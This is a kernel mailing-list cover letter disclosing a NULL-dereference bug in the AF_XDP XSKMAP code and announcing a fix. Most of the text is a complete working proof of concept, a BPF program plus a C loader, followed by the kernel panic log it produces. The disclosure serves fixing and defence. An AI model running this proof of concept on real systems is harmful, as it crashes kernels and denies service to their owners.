All of lore.kernel.org
 help / color / mirror / Atom feed
From: Linpu Yu <linpu5433@gmail.com>
To: magnus.karlsson@intel.com, maciej.fijalkowski@intel.com,
	netdev@vger.kernel.org, bpf@vger.kernel.org
Cc: sdf@fomichev.me, davem@davemloft.net, edumazet@google.com,
	kuba@kernel.org, pabeni@redhat.com, horms@kernel.org,
	ast@kernel.org, daniel@iogearbox.net, hawk@kernel.org,
	john.fastabend@gmail.com, bjorn@kernel.org,
	linux-kernel@vger.kernel.org, yuantan098@gmail.com,
	yifanwucs@gmail.com
Subject: [PATCH 0/1] xskmap: reject TX-only AF_XDP sockets
Date: Mon, 30 Mar 2026 03:29:41 +0800	[thread overview]
Message-ID: <cover.1774701288.git.linpu5433@gmail.com> (raw)

Hi,

We found and validated a low severity security issue in
net/xdp/xskmap.c from v4.18-rc1 to v7.0-rc4. The bug can cause a
KASAN report and panic when an XDP program redirects a packet to an
XSKMAP entry backed by a TX-only AF_XDP socket. We have also
included a minimum reproducer which was tested on v7.0.0-rc4.

We will send a patch as a follow-up in this thread. We've tested
it, and it should not affect any other functionality.

---- details below ----

Bug details:
xsk_map_update_elem() accepts any PF_XDP socket and does not
require an Rx ring. A TX-only AF_XDP socket can therefore be
inserted into an XSKMAP.

When an XDP program redirects a packet through such an entry, the
packet always enters the Rx path. The generic receive path reaches
xsk_generic_rcv(), which assumes xs->rx is valid and dereferences
it. With a TX-only socket, xs->rx is NULL and the kernel reports a
KASAN null-ptr-deref before panicking.

The root cause is that XSKMAP publication validates only the socket
family, but redirect delivery requires an Rx-capable AF_XDP socket.

Required kernel config:
CONFIG_BPF
CONFIG_BPF_SYSCALL
CONFIG_XDP_SOCKETS
CONFIG_VETH

Reproducer:
    clang -O2 -g -target bpf -D__TARGET_ARCH_x86         -I/usr/include/x86_64-linux-gnu -c -o poc.bpf.o poc.bpf.c
    gcc -O2 -g -Wall -Wextra -o poc poc.c -lbpf -lelf -lz
    sudo ./poc ./poc.bpf.o

We have validated the PoC on v7.0.0-rc4 and v6.12.74.

---8<--- BEGIN poc.bpf.c ---8<---
// SPDX-License-Identifier: GPL-2.0
#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>

struct {
	__uint(type, BPF_MAP_TYPE_XSKMAP);
	__uint(max_entries, 1);
	__type(key, __u32);
	__type(value, __u32);
} xsks SEC(".maps");

SEC("xdp")
int redirect_to_xsk(struct xdp_md *ctx)
{
	return bpf_redirect_map(&xsks, 0, XDP_PASS);
}

char _license[] SEC("license") = "GPL";
---8<--- END poc.bpf.c ---8<---

---8<--- BEGIN poc.c ---8<---
// SPDX-License-Identifier: GPL-2.0
#define _GNU_SOURCE

#include <errno.h>
#include <net/if.h>
#include <netinet/in.h>
#include <linux/if_ether.h>
#include <linux/if_packet.h>
#include <linux/if_link.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <unistd.h>

#include <bpf/bpf.h>
#include <bpf/libbpf.h>
#include <bpf/xsk.h>

#define RX_IFACE "vethxdp0"
#define TX_IFACE "vethxdp1"
#define QUEUE_ID 0
#define NUM_DESCS 64
#define FRAME_SIZE XSK_UMEM__DEFAULT_FRAME_SIZE
#define NUM_FRAMES 16
#define UMEM_SIZE ((size_t)FRAME_SIZE * NUM_FRAMES)

static const unsigned char rx_mac[ETH_ALEN] = {0x02, 0x00, 0x00, 0x00, 0x00, 0x01};
static const unsigned char tx_mac[ETH_ALEN] = {0x02, 0x00, 0x00, 0x00, 0x00, 0x02};

static int run_cmd(const char *fmt, ...)
{
	char cmd[512];
	va_list ap;
	int rc;

	va_start(ap, fmt);
	vsnprintf(cmd, sizeof(cmd), fmt, ap);
	va_end(ap);

	rc = system(cmd);
	if (rc)
		fprintf(stderr, "command failed (%d): %s\n", rc, cmd);
	return rc;
}

static int cleanup_links(void)
{
	return system("ip link del " RX_IFACE " >/dev/null 2>&1");
}

static int setup_links(void)
{
	int rc;

	cleanup_links();

	rc = run_cmd("ip link add " RX_IFACE " type veth peer name " TX_IFACE);
	if (rc)
		return -1;
	rc = run_cmd("ip link set dev " RX_IFACE " address 02:00:00:00:00:01");
	if (rc)
		return -1;
	rc = run_cmd("ip link set dev " TX_IFACE " address 02:00:00:00:00:02");
	if (rc)
		return -1;
	rc = run_cmd("ip link set dev " RX_IFACE " up");
	if (rc)
		return -1;
	rc = run_cmd("ip link set dev " TX_IFACE " up");
	if (rc)
		return -1;

	return 0;
}

static int send_test_frame(int ifindex)
{
	unsigned char frame[64];
	struct sockaddr_ll addr;
	struct ethhdr *eth = (struct ethhdr *)frame;
	int fd, ret;

	memset(frame, 0x41, sizeof(frame));
	memcpy(eth->h_dest, rx_mac, ETH_ALEN);
	memcpy(eth->h_source, tx_mac, ETH_ALEN);
	eth->h_proto = htons(ETH_P_IP);

	fd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_IP));
	if (fd < 0) {
		perror("socket(AF_PACKET)");
		return -1;
	}

	memset(&addr, 0, sizeof(addr));
	addr.sll_family = AF_PACKET;
	addr.sll_protocol = htons(ETH_P_IP);
	addr.sll_ifindex = ifindex;
	addr.sll_halen = ETH_ALEN;
	memcpy(addr.sll_addr, rx_mac, ETH_ALEN);

	ret = sendto(fd, frame, sizeof(frame), 0,
		     (struct sockaddr *)&addr, sizeof(addr));
	if (ret < 0) {
		perror("sendto");
		close(fd);
		return -1;
	}

	close(fd);
	return 0;
}

static int libbpf_print_fn(enum libbpf_print_level level, const char *fmt, va_list args)
{
	if (level == LIBBPF_DEBUG)
		return 0;
	return vfprintf(stderr, fmt, args);
}

int main(int argc, char **argv)
{
	struct xsk_ring_prod fill = {}, tx = {};
	struct xsk_ring_cons comp = {};
	struct xsk_socket_config xsk_cfg = {
		.rx_size = NUM_DESCS,
		.tx_size = NUM_DESCS,
		.libbpf_flags = XSK_LIBBPF_FLAGS__INHIBIT_PROG_LOAD,
		.xdp_flags = XDP_FLAGS_SKB_MODE,
		.bind_flags = XDP_COPY,
	};
	struct rlimit rlim = {
		.rlim_cur = RLIM_INFINITY,
		.rlim_max = RLIM_INFINITY,
	};
	struct xsk_umem *umem = NULL;
	struct xsk_socket *xsk = NULL;
	struct bpf_program *prog;
	struct bpf_object *obj = NULL;
	struct bpf_map *xsks_map;
	const char *bpf_path;
	void *umem_area = NULL;
	int rx_ifindex = -1, tx_ifindex = -1;
	int err = 1;

	if (argc > 2) {
		fprintf(stderr, "usage: %s [./poc.bpf.o]\n", argv[0]);
		return 1;
	}

	bpf_path = argc == 2 ? argv[1] : "./poc.bpf.o";

	libbpf_set_print(libbpf_print_fn);
	setrlimit(RLIMIT_MEMLOCK, &rlim);

	if (setup_links()) {
		fprintf(stderr, "failed to create veth pair\n");
		goto out;
	}

	rx_ifindex = if_nametoindex(RX_IFACE);
	tx_ifindex = if_nametoindex(TX_IFACE);
	if (!rx_ifindex || !tx_ifindex) {
		fprintf(stderr, "if_nametoindex failed\n");
		goto out;
	}

	if (posix_memalign(&umem_area, getpagesize(), UMEM_SIZE)) {
		fprintf(stderr, "posix_memalign failed\n");
		goto out;
	}
	memset(umem_area, 0, UMEM_SIZE);

	err = xsk_umem__create(&umem, umem_area, UMEM_SIZE, &fill, &comp, NULL);
	if (err) {
		fprintf(stderr, "xsk_umem__create failed: %d\n", err);
		goto out;
	}

	err = xsk_socket__create(&xsk, RX_IFACE, QUEUE_ID, umem, NULL, &tx, &xsk_cfg);
	if (err) {
		fprintf(stderr, "xsk_socket__create failed: %d\n", err);
		goto out;
	}

	obj = bpf_object__open_file(bpf_path, NULL);
	if (libbpf_get_error(obj)) {
		err = (int)libbpf_get_error(obj);
		obj = NULL;
		fprintf(stderr, "bpf_object__open_file failed: %d\n", err);
		goto out;
	}

	err = bpf_object__load(obj);
	if (err) {
		fprintf(stderr, "bpf_object__load failed: %d\n", err);
		goto out;
	}

	prog = bpf_object__find_program_by_name(obj, "redirect_to_xsk");
	if (!prog) {
		fprintf(stderr, "failed to find program\n");
		goto out;
	}

	xsks_map = bpf_object__find_map_by_name(obj, "xsks");
	if (!xsks_map) {
		fprintf(stderr, "failed to find xsks map\n");
		goto out;
	}

	err = bpf_set_link_xdp_fd(rx_ifindex, bpf_program__fd(prog), XDP_FLAGS_SKB_MODE);
	if (err) {
		fprintf(stderr, "bpf_set_link_xdp_fd attach failed: %d\n", err);
		goto out;
	}

	err = xsk_socket__update_xskmap(xsk, bpf_map__fd(xsks_map));
	if (err) {
		fprintf(stderr, "xsk_socket__update_xskmap failed: %d\n", err);
		goto out;
	}

	fprintf(stderr, "sending one frame into %s queue %d\n", RX_IFACE, QUEUE_ID);
	fflush(stderr);

	if (send_test_frame(tx_ifindex))
		goto out;

	sleep(2);
	fprintf(stderr, "no crash observed\n");
	err = 0;

out:
	if (rx_ifindex > 0)
		bpf_set_link_xdp_fd(rx_ifindex, -1, XDP_FLAGS_SKB_MODE);
	if (xsk)
		xsk_socket__delete(xsk);
	if (umem)
		xsk_umem__delete(umem);
	free(umem_area);
	if (obj)
		bpf_object__close(obj);
	cleanup_links();
	return err;
}
---8<--- END poc.c ---8<---

Crash log:
[  628.881280][    C0] Oops: general protection fault, probably for non-canonical address 0xdffffc0000000001: 0000 [#1] PREEMPT SMP KASAN NOPTI
[  628.882528][    C0] KASAN: null-ptr-deref in range [0x0000000000000008-0x000000000000000f]
[  628.883234][    C0] CPU: 0 UID: 0 PID: 10251 Comm: poc Not tainted 6.12.74 #3
[  628.883828][    C0] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[  628.884701][    C0] RIP: 0010:xsk_generic_rcv+0x1c1/0x460
[  628.885258][    C0] Code: 48 c1 ea 03 80 3c 02 00 0f 85 a0 02 00 00 48 8b 9d 80 05 00 00 48 b8 00 00 00 00 00 fc ff df 48 8d 7b 08 48 89 fa 48 c1 ea 03 <0f> b6 04 02 84 c0 74 09 3c 03 7f 05 e8 5e d6 ee f6 44 8b 73 08 48
[  628.886884][    C0] RSP: 0018:ffffc90000007738 EFLAGS: 00010212
[  628.887445][    C0] RAX: dffffc0000000000 RBX: 0000000000000000 RCX: ffff88803fe40800
[  628.888062][    C0] RDX: 0000000000000001 RSI: ffffffff8b08bfc6 RDI: 0000000000000008
[  628.888699][    C0] RBP: ffff88803fe40800 R08: 0000000000000004 R09: 0000000000000000
[  628.889359][    C0] R10: 0000000000000000 R11: 0000000000000001 R12: 00000000fffffff4
[  628.889985][    C0] R13: ffff88803fe40da8 R14: 0000000000000040 R15: ffffc90000007e98
[  628.890669][    C0] FS:  00007f7fe6b52740(0000) GS:ffff88806a800000(0000) knlGS:0000000000000000
[  628.891406][    C0] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  628.891949][    C0] CR2: 00007f7fe6c9f350 CR3: 0000000031de6000 CR4: 0000000000750ef0
[  628.892613][    C0] PKRU: 55555554
[  628.892925][    C0] Call Trace:
[  628.893226][    C0]  <IRQ>
[  628.945597][    C0] Modules linked in:
[  628.946047][    C0] ---[ end trace 0000000000000000 ]---
[  628.946512][    C0] RIP: 0010:xsk_generic_rcv+0x1c1/0x460
[  628.954560][    C0] Kernel panic - not syncing: Fatal exception in interrupt
[  628.955982][    C0] Kernel Offset: disabled

Best regards
Linpu Yu


Linpu Yu (1):
  xskmap: reject TX-only AF_XDP sockets

 net/xdp/xskmap.c | 4 ++++
 1 file changed, 4 insertions(+)

-- 
2.53.0


             reply	other threads:[~2026-03-29 19:29 UTC|newest]

Thread overview: 6+ messages / expand[flat|nested]  mbox.gz  Atom feed  top
2026-03-29 19:29 Linpu Yu [this message]
2026-03-29 19:29 ` [PATCH 1/1] xskmap: reject TX-only AF_XDP sockets Linpu Yu
2026-03-30  2:22   ` Jason Xing
2026-03-30 13:50   ` Maciej Fijalkowski
2026-04-15  8:43   ` Jason Xing
2026-04-15 17:22     ` Yuan Tan

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting_style#Interleaved_style

* Reply using the --to, --cc, and --in-reply-to
  switches of git-send-email(1):

  git send-email \
    --in-reply-to=cover.1774701288.git.linpu5433@gmail.com \
    --to=linpu5433@gmail.com \
    --cc=ast@kernel.org \
    --cc=bjorn@kernel.org \
    --cc=bpf@vger.kernel.org \
    --cc=daniel@iogearbox.net \
    --cc=davem@davemloft.net \
    --cc=edumazet@google.com \
    --cc=hawk@kernel.org \
    --cc=horms@kernel.org \
    --cc=john.fastabend@gmail.com \
    --cc=kuba@kernel.org \
    --cc=linux-kernel@vger.kernel.org \
    --cc=maciej.fijalkowski@intel.com \
    --cc=magnus.karlsson@intel.com \
    --cc=netdev@vger.kernel.org \
    --cc=pabeni@redhat.com \
    --cc=sdf@fomichev.me \
    --cc=yifanwucs@gmail.com \
    --cc=yuantan098@gmail.com \
    /path/to/YOUR_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

* If your mail client supports setting the In-Reply-To header
  via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line before the message body.
This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.